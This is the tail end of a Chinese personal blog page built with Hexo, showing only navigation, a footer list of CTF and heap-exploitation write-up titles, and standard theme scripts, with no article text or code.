  <p class="name" itemprop="name">invincible</p>
  <div class="description" itemprop="description">凌恒山其若陋兮、</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">14</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">2</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">6</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="/default/" rel="section"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>

</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/07/Libcsearcher%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE/" title="LibcSearcher环境配置和ubuntu更新换源问题">LibcSearcher环境配置和ubuntu更新换源问题</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/07/11/2022%E8%93%9D%E5%B8%BDpwn%20wp/" title="2022蓝帽pwn wp">2022蓝帽pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/11/29/SCU%E6%96%B0%E7%94%9F%E8%B5%9B2021/" title="SCU新生赛2021 pwn wp">SCU新生赛2021 pwn wp</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/03/13/Tcache%20bin%E6%80%BB%E7%BB%93/" title="Tcachebin 总结">Tcachebin 总结</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/08/20/string/" title="攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解">攻防世界string wp 以及个人对格式化字符漏洞偏移量的一些理解</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/02/02/%E5%88%A9%E7%94%A8realloc%E8%B0%83%E6%95%B4%E6%A0%88%E4%BD%BFone_gadget%E7%94%9F%E6%95%88/" title="利用realloc调整栈使one_gadget生效">利用realloc调整栈使one_gadget生效</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2021/09/03/babyrop/" title="标准32位程序ROP流程和c语言转义字符">标准32位程序ROP流程和c语言转义字符</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/30/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-UAF/" title="堆学习-UAF">堆学习-UAF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="分类于 学习笔记">学习笔记</a>
</div>

    <span><a href="/2021/10/24/%E5%A0%86%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-chunk%20overlapping/" title="堆学习-Chunk Overlapping">堆学习-Chunk Overlapping</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/CTF/" title="分类于 CTF">CTF</a>
</div>

    <span><a href="/2022/04/06/wustctf2020_babyfmt/" title="wustctf2020_babyfmt">wustctf2020_babyfmt</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2022</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">invincible @ Nirvana</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: '2021/08/20/string/',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//cdn.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




</body>
</html>
